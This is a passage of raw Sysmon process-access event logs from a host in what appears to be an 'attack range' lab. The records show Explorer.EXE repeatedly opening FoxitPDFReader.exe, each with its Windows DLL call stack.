Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7eeaf|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040628Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7ee1a|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040627Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040626Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040625Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7eeaf|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040624Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7ee1a|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040623Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040622Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.417{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040621Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.401{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7eeaf|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040620Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.401{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7ee1a|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040619Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.401{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040618Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.401{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040617Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.401{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7eeaf|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040616Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.401{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7ee1a|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040615Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.401{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040614Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.401{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040613Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.401{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7eeaf|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040612Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.401{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7ee1a|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040611Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.401{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040610Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.401{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040609Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.401{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7eeaf|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040608Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.401{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040607Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.401{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7ee1a|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040606Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.401{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+7edf6|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040605Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.401{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7eeaf|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040604Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.401{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0f5|C:\Windows\System32\SHELL32.dll+7ee1a|C:\Windows\System32\SHELL32.dll+807a8|C:\Windows\System32\SHELL32.dll+7d425|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+8120a|C:\Windows\System32\SHELL32.dll+e178a|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040603Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.401{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF 